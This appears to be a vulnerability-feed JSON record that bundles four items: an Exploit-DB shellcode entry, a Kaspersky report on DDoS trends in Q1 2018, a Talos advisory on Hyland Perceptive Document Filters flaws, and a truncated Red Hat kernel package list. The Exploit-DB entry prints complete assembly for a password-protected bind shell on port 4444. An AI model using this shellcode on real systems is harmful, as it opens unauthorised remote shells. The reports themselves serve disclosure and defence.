{"result": {"exploitdb": [{"lastseen": "2018-02-02T14:53:11", "osvdbidlist": [], "references": [], "description": "Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes). Shellcode exploit for Linux_x86-64 platform", "edition": 1, "reporter": "Exploit-DB", "published": "2018-11-09T00:00:00", "title": "Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)", "type": "exploitdb", "enchantments": {"score": null}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-11-09T00:00:00", "id": "EDB-ID:43951", "href": "https://www.exploit-db.com/exploits/43951/", "sourceData": "global _start\r\n\r\n_start:\r\n\r\n\t; sock = socket(AF_INET, SOCK_STREAM, 0)\r\n\t; AF_INET = 2\r\n\t; SOCK_STREAM = 1\r\n\t; syscall number 41 \r\n\r\n\tpush 41\r\n\tpop rax\r\n\tpush 2\r\n\tpop rdi\r\n\tpush 1\r\n\tpop rsi\r\n\tcdq\r\n\tsyscall\r\n\t\r\n\t; copy socket descriptor to rdi for future use \r\n\r\n\txchg rdi,rax\r\n\r\n\t; server.sin_family = AF_INET \r\n\t; server.sin_port = htons(PORT)\r\n\t; server.sin_addr.s_addr = INADDR_ANY\r\n\t; bzero(&server.sin_zero, 8)\r\n\r\n\tpush rdx\r\n\tmov dx,0x5c11\r\n\tshl rdx,16\r\n\txor dl,0x2\r\n\tpush rdx\r\n\r\n\t; bind(sock, (struct sockaddr *)&server, sockaddr_len)\r\n\t; syscall number 49\r\n\r\n\tmov rsi, rsp\r\n\tmov al,49\r\n\tpush 16\r\n\tpop rdx\r\n\tsyscall\r\n\r\n\t; listen(sock, MAX_CLIENTS)\r\n\t; syscall number 50\r\n\r\n\tpush 50\r\n\tpop rax\r\n\tpush 2\r\n\tpop rsi\r\n\tsyscall\r\n\r\n\t; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)\r\n\t; syscall number 43\r\n\r\n\tmov al,43\r\n\tsub rsp,16\r\n\tmov rsi,rsp\r\n\tpush 16\r\n\tmov rdx,rsp\r\n\tsyscall\r\n\r\n\t; close parent\r\n\t;push 3\r\n\t;pop rax\r\n\t;syscall\r\n\r\n\t; duplicate sockets\r\n\r\n\t; dup2 (new, old)\r\n\txchg rdi,rax\r\n\tpush 3\r\n\tpop rsi\r\ndup2cycle:\r\n\tmov al, 33\r\n\tdec esi\r\n\tsyscall\r\n\tloopnz dup2cycle\r\n\r\n\t; read passcode\r\n\t; xor rax,rax - 
already zeroed from prev cycle\r\n\txor rdi,rdi\r\n\tpush rax\r\n\tmov rsi,rsp\r\n\tpush 8\r\n\tpop rdx\r\n\tsyscall\r\n\r\n\t; Authentication with password \"1234567\"\r\n\txchg rcx,rax\r\n\tmov rbx,0x0a37363534333231\r\n\tpush rbx\r\n\tmov rdi,rsp\r\n\trepe cmpsb\r\n\tjnz wrong_pwd\r\n\r\n\t; execve stack-method\r\n\r\n\tpush 59\r\n\tpop rax\r\n\tcdq ; extends rax sign into rdx, zeroing it out\r\n\tpush rdx\r\n\tmov rbx,0x68732f6e69622f2f\r\n\tpush rbx\r\n\tmov rdi,rsp\r\n\tpush rdx\r\n\tmov rdx,rsp\r\n\tpush rdi\r\n\tmov rsi,rsp\r\n\tsyscall\r\n\r\nwrong_pwd:\r\n\tnop", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43951/"}], "securelist": [{"lastseen": "2018-04-26T10:42:26", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "\n\n## News overview\n\nIn early January, it was reported that an amateur hacker had come close to pulling off a [botnet attack](<https://www.scmagazineuk.com/huawei-router-vulnerability-exploited-most-are-unlikely-to-be-patched/article/734743/>) using \"improvised\" materials. Armed with information gleaned from hacker forums, the DIYer created a Trojan using a zero-day exploit in Huawei routers and released it online. The attack was soon nipped in the bud, but the wannabe cybercriminal could not be traced.\n\nOther slightly weightier news: first, experts reported growth in the [Reaper (or IoTroop)](<https://www.networksasia.net/article/should-you-fear-reaper.1515387121>) botnet (not to be confused with North Korean hacker group The Reaper), first discovered last quarter; second, IT security resources hinted at the emergence of new \"strains\" of Mirai and Satori (the latter, known as Okiru, is intended for ARC processors), but so far without details. 
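The Exploit-DB 43951 listing above packs its `sockaddr_in`, its password and its `//bin/sh` string into 64-bit immediates, and its password check takes the comparison length from the `read()` return value (`xchg rcx,rax` followed by `repe cmpsb`). The following Python is an added example, not code from the Exploit-DB entry: it decodes those immediates and models the comparison exactly as the listing performs it, next to a fixed-length variant (the `strict_accepts` function is an assumption of this example, not part of the shellcode).

```python
import hmac
import struct

# Constants lifted from the Exploit-DB 43951 listing above.
SOCKADDR_RDX = 0x5C110002          # mov dx,0x5c11 ; shl rdx,16 ; xor dl,0x2
PASSWORD_IMM = 0x0A37363534333231  # mov rbx,0x0a37363534333231
BINSH_IMM = 0x68732F6E69622F2F     # mov rbx,0x68732f6e69622f2f
READ_LEN = 8                       # push 8 ; pop rdx  ->  read(0, buf, 8)


def imm_to_bytes(imm: int) -> bytes:
    """A 64-bit immediate pushed with 'push rbx' lands in memory little-endian,
    so the in-memory string is the little-endian encoding of the constant."""
    return struct.pack("<Q", imm)


def decode_sockaddr(rdx: int) -> dict:
    """Interpret the pushed constant as the first 8 bytes of struct sockaddr_in:
    sin_family (2 bytes, host order), sin_port (2 bytes, network order) and
    sin_addr (4 bytes).  The earlier 'push rdx' of zero supplies sin_zero."""
    raw = struct.pack("<Q", rdx)
    (family,) = struct.unpack("<H", raw[0:2])
    (port,) = struct.unpack("!H", raw[2:4])
    addr = ".".join(str(b) for b in raw[4:8])
    return {"family": family, "port": port, "addr": addr}


def password_bytes() -> bytes:
    """The 8 bytes the client has to send: the digits plus a trailing newline."""
    return imm_to_bytes(PASSWORD_IMM)


def shellcode_accepts(received: bytes) -> bool:
    """Model of the check as written in the listing.  After read() returns,
    'xchg rcx,rax' loads the byte count into rcx and 'repe cmpsb' compares
    exactly rcx bytes, so any 1..8-byte input that is a prefix of the password
    passes.  A zero-length read is not modelled: the jnz then depends on
    whatever ZF was left by earlier instructions."""
    n = len(received)
    if not 1 <= n <= READ_LEN:
        raise ValueError("read(..., 8) returns between 1 and 8 bytes here")
    return received == password_bytes()[:n]


def strict_accepts(received: bytes) -> bool:
    """Hardened comparison (an assumption of this example, not on the page):
    require all 8 bytes and compare in constant time."""
    return hmac.compare_digest(received, password_bytes())
```

`decode_sockaddr` confirms the listener is `AF_INET`, port 4444, `INADDR_ANY`; `shellcode_accepts` shows why the listing's password is only as strong as its first byte when the client sends a short read.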
Moreover, in early February a platform selling [JenX botnet](<https://www.scmagazineuk.com/jenx-botnet-using-video-game-to-recruit-iot-devices/article/741884/>) services was detected and neutralized. JenX was found to be using a fan server for the video game GTA: San Andreas as its C&C. In terms of power, JenX was nothing to write home about, but the originality of its creators deserves a mention. On the topic of original botnets, another worth noting is [DoubleDoor](<https://www.bleepingcomputer.com/news/security/doubledoor-botnet-chains-exploits-to-bypass-firewalls/>): the first known piece of \"wild\" malware to bundle two IoT vulnerabilities together.\n\nAs for new methods and vulnerabilities, besides the multiget hole in Memcached, last quarter news broke of a vulnerability in [WordPress](<https://www.scmagazineuk.com/serious-dos-flaw-spotted-in-wordpress-platform\u2013affects-most-versions/article/742562/>) that makes it easy to down a web server. Fortunately, no in-the-wild attacks were observed.\n\nThe attack targets for this new weaponry remained largely the same. Profit is still the main motive behind DDoS attacks (the number of attacks on business in Russia alone [doubled](<https://www.kaspersky.ru/about/press-releases/2017_increase-in-the-number-of-ddos-attacks-on-russian-business>) in 2017), although high-profile \"commercial\" attacks in the last three months were not so numerous. Within the space of three days in early February, players of [Final Fantasy](<https://www.scmagazine.com/final-fantasy-network-recovers-after-losing-health-points-to-ddos-attack/article/742432/>) encountered problems signing into certain services. At roughly the same time, BusinessWire experienced similar difficulties lasting more than a week, during which period neither editors nor readers could access the news portal. 
There was no reported ransom demand, so the motive behind the attack can be assumed to be competition-related.\n\nIt would be amiss not to mention a series of attacks that hit GitHub and an unknown service provider in early March, which produced record volumes of garbage traffic: over 1 Tbit/s. This capacity was achieved by leveraging Memcached, a popular caching service for Linux servers. Interestingly, in some of these attacks the garbage traffic itself contained ransom demands in Monero.\n\nPolitical motives are less common, but often more visible due to their topicality. The most high-profile incident of late was, of course, the threat to [sabotage](<http://www.computerweekly.com/news/252434847/PyeongChang-Winter-Games-hit-by-cyber-attack>) the opening ceremony of the Winter Olympics in early February, most likely through a DDoS offensive. Even before that, in late January, the US Department of Defense repelled an influx of spam, and in late March their Russian counterparts had to survive a DDoS attack. In addition, experts reported that North Korean group The Reaper was extending its reach. Despite not showing any DDoS activity, it could soon start moving in that direction.\n\nAnother hard-hitting DDoS attack on major financial institutions in the Netherlands was initially thought to be political, but on closer inspection turned out to be pure [hooliganism](<http://www.nuwireinvestor.com/lessons-dutch-banking-attacks-prevent-ddos-attacks/>): Dutch police arrested a teen suspect for causing week-long mayhem at several banks simply to prove that it was possible.\n\nDDoS is also becoming more popular as a means of personal revenge. California, for instance, witnessed the case of David Goodyear, who was found guilty of trying to launch a DDoS attack against an amateur astronomy forum when it blacklisted him for using bad language. 
True, he can't be accused of not trying other methods before turning his hand to cybercrime: Goodyear repeatedly registered on the forum under different chat names, but each time earned himself a ban for boorish behavior.\n\n## Quarter trends\n\nDue to its capacity and relative accessibility, Memcached was the springboard for last quarter's most sensational attacks. However, it could prove to be a short-lived trend, and here's why.\n\nIn late February, Kaspersky DDoS Protection support was contacted by a company reporting an unusually high load on its communications channel in what it suspected to be a DDoS attack.\n\nAt first glance, the picture did indeed resemble a typical DDoS attack: the channel was clogged up, and users couldn't access the company's services. However, our investigation revealed that one of the client's servers was a CentOS Linux host running a vulnerable Memcached service. This service, used by the cybercriminals during the attack, generated large amounts of outgoing traffic, overloading the channel. In other words, the client was not the target, but an unwitting accomplice in the DDoS attack: the attackers used its server as an amplifier. After Kaspersky Lab's recommendations were implemented, the malicious parasitic traffic stopped.\n\nThis situation is typical for Memcached attacks: owners of vulnerable servers hijacked during attacks notice the load increase and rush to patch any vulnerabilities so as not to suffer further downtime losses. As a result, the number of vulnerable servers that can be utilized for this type of attack is rapidly declining, for which reason Memcached attacks will likely dry up soon.\n\nStill, the picture in Q1 shows that \"amplified\" attacks, which were on the wane, have again picked up momentum. NTP- and DNS-based amplification has practically disappeared, since most vulnerable services have already been patched. Cybercriminals will likely seek out other non-standard amplification methods besides Memcached. 
Last quarter, for instance, we recorded a rare (yet effective) type of amplification attack in which an LDAP service was used as the amplifier. Alongside Memcached, NTP, and DNS, this service has one of the largest amplification factors. Despite the relatively small number of LDAP servers available, this type of attack could become popular on underground markets in the coming months.\n\n## Statistics for botnet-assisted DDoS attacks\n\n### Methodology\n\nKaspersky Lab has extensive experience of combating cyber threats, including DDoS attacks of varying complexity and scale. Company experts track the actions of botnets by using the DDoS Intelligence system.\n\nAs part of the [Kaspersky DDoS Protection](<http://kaspersky.ru/ddos-prevention>) solution, the DDoS Intelligence system intercepts and analyzes commands sent to bots from C&C servers; it does not require any user devices to be infected or cybercriminals to execute any actual commands.\n\nThis report contains DDoS Intelligence statistics for Q1 2018.\n\nIn the context of this report, an incident is counted as a separate (single) DDoS attack if the interval between botnet activity periods does not exceed 24 hours. For example, if one particular web resource was attacked by the same botnet in two waves with an interval of 24 hours or more, the incident is counted as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.\n\nThe geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.\n\nDDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. 
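The Memcached incident described above (a client's own server acting as the amplifier, noticed only because its uplink filled with outbound traffic) and the LDAP case that follows it share one signature in flow data: a local UDP service that emits far more bytes than it receives, almost all of them toward one destination. The following Python is an added example, not part of the Kaspersky report: a reflector detector run over constructed flow records. The network `10.0.0.0/24`, the hosts, the byte counts and the threshold are all assumptions of this example.

```python
import ipaddress
from collections import defaultdict

# UDP services the report names as amplifiers, keyed by their well-known port.
REFLECTOR_PORTS = {11211: "memcached", 389: "ldap", 123: "ntp", 53: "dns"}

# Constructed flow records (not from the page): proto, src, sport, dst, dport, bytes.
# 10.0.0.0/24 is the monitored network; 203.0.113.7 plays the spoofed victim.
SAMPLE_FLOWS = [
    ("udp", "203.0.113.7", 4444, "10.0.0.5", 11211, 15),      # tiny request, source spoofed to the victim
    ("udp", "203.0.113.7", 4444, "10.0.0.5", 11211, 15),
    ("udp", "10.0.0.5", 11211, "203.0.113.7", 4444, 64000),   # large reply leaves the network toward the victim
    ("udp", "10.0.0.5", 11211, "203.0.113.7", 4444, 64000),
    ("udp", "10.0.0.20", 51000, "10.0.0.9", 53, 60),          # ordinary internal DNS lookup
    ("udp", "10.0.0.9", 53, "10.0.0.20", 51000, 120),
    ("tcp", "10.0.0.5", 443, "198.51.100.4", 50001, 900000),  # bulk TCP download: large, but not reflection
]


def find_reflectors(flows, local_net="10.0.0.0/24", min_factor=10.0):
    """Return {(host, service): {"factor": ..., "top_target": ...}} for local UDP
    services whose outbound bytes exceed inbound bytes by at least min_factor.
    A healthy service answers with roughly request-sized replies; a reflector
    emits far more than it receives, and the destination of that excess is the
    real victim of the attack."""
    net = ipaddress.ip_network(local_net)
    inbound = defaultdict(int)
    outbound = defaultdict(int)
    targets = defaultdict(lambda: defaultdict(int))
    for proto, src, sport, dst, dport, nbytes in flows:
        if proto != "udp":
            continue
        if dport in REFLECTOR_PORTS and ipaddress.ip_address(dst) in net:
            inbound[(dst, dport)] += nbytes
        if sport in REFLECTOR_PORTS and ipaddress.ip_address(src) in net:
            outbound[(src, sport)] += nbytes
            targets[(src, sport)][dst] += nbytes
    findings = {}
    for (host, port), out_bytes in outbound.items():
        in_bytes = inbound.get((host, port), 0)
        factor = out_bytes / in_bytes if in_bytes else float("inf")
        if factor >= min_factor:
            per_dst = targets[(host, port)]
            findings[(host, REFLECTOR_PORTS[port])] = {
                "factor": factor,
                "top_target": max(per_dst, key=per_dst.get),
            }
    return findings
```

The threshold matters: the internal DNS server in the sample answers with twice the bytes it receives, which is normal, and only appears if `min_factor` is lowered. For a flagged Memcached host the fix is configuration rather than patching: bind it to localhost (`-l 127.0.0.1`) or disable the UDP listener (`-U 0`, the default since memcached 1.5.6), and drop UDP/11211 at the border; CLDAP on UDP/389 likewise has no business being reachable from the Internet.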
Note that botnets are just one of the tools for performing DDoS attacks, and that the data presented in this report do not cover every single DDoS attack that occurred during the period under review.\n\n### Quarter results\n\n * In Q1 2018, DDoS attacks were registered against targets in 79 countries (84 in the previous quarter). As ever, the vast majority (95.14%) occurred in the top ten countries.\n * As for attack targets, as usual about half were located in China (47.53%), although the share was somewhat lower against the previous quarter.\n * The number of attacks and targets rose significantly, as did the number of long-duration attacks. The most sustained DDoS attack lasted 297 hours (more than 12 days), making it one of the longest in recent years.\n * The share of Linux botnets fell slightly to 66% against the previous quarter's 71%.\n * Significant peaks in the number and power of cyberattacks were observed in mid-January and early March, while the mid-quarter period was relatively calm.\n\n### Geography of attacks\n\nChina easily retained pole position by number of attacks: its share remained almost unchanged, up from 59.18% to 59.42%. The US share (17.83%), the second largest, increased by a more noticeable 1.83%. South Korea again took bronze, but its share fell by more than 2%, from 10.21% to 8%.\n\nBritain (1.30%) moved from fourth to fifth. Tenth place in Q1 2018 went to Russia, whose share decreased from 1.25% to 0.76%. The Netherlands and Vietnam dropped out of the top ten, but Hong Kong (with a solid 3.67% against 0.67% in Q4 2017) and Japan (1.16%) reappeared.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/26083748/180426-ddos-report-q1-2018-en-1.png>)\n\n_Distribution of DDoS attacks by country, Q1 2018 and Q4 2017_\n\nAs regards the distribution of attack targets, top spot again belongs to China, although its share declined from 51.84% to 47.53%. 
Meanwhile, the still second-place US saw its share increase from 19.32% to 24.10%. Third position was taken by South Korea (9.62%). France's ranking changed significantly: shedding just 0.65% this quarter, it dropped from fifth to ninth place.\n\nThe list of top ten most attacked countries said goodbye to Russia and the Netherlands, but welcomed Hong Kong (4.76%) straight into fourth place, and Japan (1.6%) into sixth. Overall this quarter, the total share of top ten countries increased slightly to 94.17% against 92.9% at the end of 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/26083758/180426-ddos-report-q1-2018-en-2.png>)\n\n_Distribution of unique DDoS-attack targets by country, Q4 2017 and Q1 2018_\n\n### Dynamics of the number of DDoS attacks\n\nMost Q1 activity occurred in the first and last third. The number of attacks peaked on January 19 (666) and March 7 (687 attacks). This is probably linked to the end of the New Year holidays (the number of attacks began to rise around the second week of January) and the March sales (in connection with International Women's Day). The quietest days were observed at roughly the same time: January 16 and March 11. The mid-quarter period passed relatively smoothly without significant peaks or noticeable declines.\n\nThe calmest day of the week in the latest quarter was Sunday, accounting for just 11.35% of all attacks. \n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/26083807/180426-ddos-report-q1-2018-en-3.png>)\n\n_Distribution of DDoS attacks by day of the week, Q4 2017 and Q1 2018_\n\n### Types and duration of DDoS attacks\n\nThe share of SYN-DDOS attacks increased slightly (from 55.63% to 57.3%), but there was no repeat of the situation seen in previous quarters. The share of ICMP attacks almost doubled, from 3.4% to 6.1%. 
Accordingly, UDP, TCP and HTTP floods were forced to cede some ground: their shares dropped by 1-2% against the previous quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/26083816/180426-ddos-report-q1-2018-en-4.png>)\n\n_Distribution of DDoS attacks by type, Q1 2018_\n\nAfter some respite at the end of 2017, we saw a return of sustained attacks: the longest lasted 297 hours (12.4 days). And although that falls short of the world record, the magnitude is still considerable. We have to go back to late 2015 for a longer attack.\n\nThe share of all other sustained attacks (50 hours or more) increased by more than six times, from 0.10% to 0.63%. At the other end of the spectrum, the share of the shortest attacks (9 hours or less) also grew: if last quarter they accounted for 85.5% of all attacks, now the figure stands at 91.47%. Meanwhile, the number of attacks lasting between 10 hours and three days in the latest quarter almost halved from 14.85% to 7.76%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/26083825/180426-ddos-report-q1-2018-en-5.png>)\n\n_Distribution of DDoS attacks by duration (hours), Q4 2017 and Q1 2018_\n\nThe top ten countries by number of C&C servers last quarter underwent a major reshuffle: Canada, Turkey, Lithuania, and Denmark dropped out, while Italy, Hong Kong, Germany, and Britain climbed upwards. The top three remained practically unchanged: South Korea (30.92%), the US (29.32%), China (8.03%). Only Russia (2.01%), having shared bronze with China in late 2017, slid down to ninth place.\n\nThe US share almost doubled, bringing it within touching distance of this ranking's perennial leader South Korea. In addition, the shares of Italy (6.83%), which last quarter did not even make the top ten, the Netherlands (5.62%), and France (3.61%) increased significantly. 
This jump was due to a sharp rise in the number of C&C accounts for Darkai (in the US, Italy, the Netherlands, and France) and AESDDoS (in China) bots.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/26083834/180426-ddos-report-q1-2018-en-6.png>)\n\n_Distribution of botnet C&C servers by country, Q1 2018_\n\nThe share of Linux botnets last quarter fell slightly compared to the end of 2017, down to 66% from 71%. Accordingly, the share of Windows-based botnets climbed from 29% to 34%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/26083843/180426-ddos-report-q1-2018-en-7.png>)\n\n_Correlation between Windows- and Linux-based botnet attacks, Q1 2018_\n\n## Conclusion\n\nIn Q1 2018, we observed a significant increase in both the total number and duration of DDoS attacks against Q4 2017. The new Linux-based botnets Darkai (a Mirai clone) and AESDDoS are largely responsible for this hike. The number of now familiar Xor attacks also rose. Neither did Windows-based botnets remain idle, making some headway against Linux in the total number of attacks. The old Yoyo botnet was particularly lively, almost five times as active.\n\nThe number of mixed attacks involving several botnet families also increased. This is a clear continuation of the trend that we spoke about at the end of last year: to optimize outlays, attackers utilize unused parts of botnets to generate garbage traffic, redeploying them across targets.\n\nAmplified attacks returned to the cyber arena, particularly through the Memcached service. However, we expect that server owners will quickly spot the abundance of garbage traffic and patch up the vulnerabilities, which will dent the popularity of attacks of this type. 
That being the case, DDoS masterminds will likely seek out other amplification methods, one of which could be LDAP services.", "reporter": "Alexander Khalimonenko", "published": "2018-04-26T10:00:30", "type": "securelist", "title": "DDoS attacks in Q1 2018", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-26T10:00:30", "id": "SECURELIST:4EE90829FD3DF230644DD3D165180DAB", "href": "https://securelist.com/ddos-report-in-q1-2018/85373/", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2018-04-26T14:39:05", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "Vulnerabilities discovered by Marcin 'Icewall' Noga from Talos \n\n\n### Overview\n\n \n\n\nTalos has discovered multiple vulnerabilities in Hyland Perceptive Document Filters software. This software is a toolkit that allows developers to read and extract metadata from a file. It supports a large set of common file formats. In addition to this, the software is also capable of converting between file formats. \n \nWe identified four vulnerabilities that allow an attacker to execute arbitrary code on vulnerable systems. All four concern the file conversion features. \n \nThe vulnerabilities can be exploited locally, and also remotely when the toolkit is run in batch mode: a maliciously crafted document is then processed automatically, and successful exploitation gives full control of the vulnerable system. The vulnerable features are used in big data, eDiscovery, DLP, email archival, content management, business intelligence and intelligent capture services, where the toolkit converts common formats such as Microsoft's document formats into other formats (for example, ones that are easier to parse). 
\n \n \n \n\n\n## Details\n\n### Code Execution\n\n \n\n\n#### TALOS-2018-0538 (CVE-2018-3855) - Hyland Perceptive Document Filters DOC to HTML updateNumbering Code Execution Vulnerability\n\n \nThis vulnerability affects the conversion of a DOC document to an HTML file. A specially crafted DOC file can lead to a stack-based buffer overflow and remote code execution. \n \nMore details can be found in the vulnerability report: \n \n[TALOS-2018-0538](<http://www.talosintelligence.com/reports/TALOS-2018-0538>) \n \n\n\n#### TALOS-2018-0527 (CVE-2018-3844) - Hyland Perceptive Document Filters DOCX to HTML Code Execution Vulnerability\n\n \nThis vulnerability affects the conversion of a DOCX document to an HTML file. A specially crafted DOCX file can lead to a use-after-free and remote code execution. \n \nMore details can be found in the vulnerability report: \n \n[TALOS-2018-0527](<http://www.talosintelligence.com/reports/TALOS-2018-0527>) \n \n\n\n#### TALOS-2018-0528 (CVE-2018-3845) - Hyland Perceptive Document Filters OpenDocument to JPEG conversion SkCanvas Code Execution vulnerability\n\n \nThis vulnerability affects the conversion of an OpenDocument file to JPEG. A crafted OpenDocument file can lead to a double free of a SkCanvas object, resulting in code execution. \n \nMore details can be found in the vulnerability report: \n \n[TALOS-2018-0528](<http://www.talosintelligence.com/reports/TALOS-2018-0528>) \n \n\n\n#### TALOS-2018-0534 (CVE-2018-3851) - Hyland Perceptive Document Filters Microsoft Word CDATA Code Execution Vulnerability\n\n \nThere is a vulnerability in the conversion of Microsoft Word (XML) documents to JPG, HTML5 and several other formats. A specially crafted Microsoft Word (XML) file can lead to heap corruption and remote code execution. 
\n \nMore details can be found in the vulnerability report: \n \n[TALOS-2018-0534](<http://www.talosintelligence.com/reports/TALOS-2018-0534>) \n \n\n\n## Tested Versions:\n\n \nPerceptive Document Filters 11.4.0.2647 - x86/x64 Windows/Linux \nPerceptive Document Filters 11.2.0.1732 - x86/x64 Windows/Linux \n \n\n\n## Coverage\n\n \nThe following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org. \n \nSnort Rules: 45689, 45690, 45717, 45718, 45750, 45751 \n \n\n\n", "reporter": "noreply@blogger.com (Paul Rascagneres)", "published": "2018-04-26T06:54:00", "type": "talosblog", "title": "Vulnerability Spotlight: Hyland Perceptive Document Filters Multiple Vulnerabilities", "enchantments": {}, "bulletinFamily": "blog", "cvelist": ["CVE-2018-3844", "CVE-2018-3845", "CVE-2018-3851", "CVE-2018-3855"], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-26T14:05:33", "id": "TALOSBLOG:7938478BFF4F92044CB8D23AEC59BD00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/X7SbVvpKh3I/hyland-vulnerabilities-code-execution.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2018-04-25T21:11:59", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel", "packageFilename": "kernel-2.6.18-348.39.1.el5.ia64.rpm", "operator": 
"lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-2.6.18-348.39.1.el5.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-PAE", "packageFilename": "kernel-PAE-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-PAE-debuginfo", "packageFilename": "kernel-PAE-debuginfo-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-PAE-devel", "packageFilename": "kernel-PAE-devel-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": 
"kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-debuginfo-common", "packageFilename": "kernel-debuginfo-common-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": 
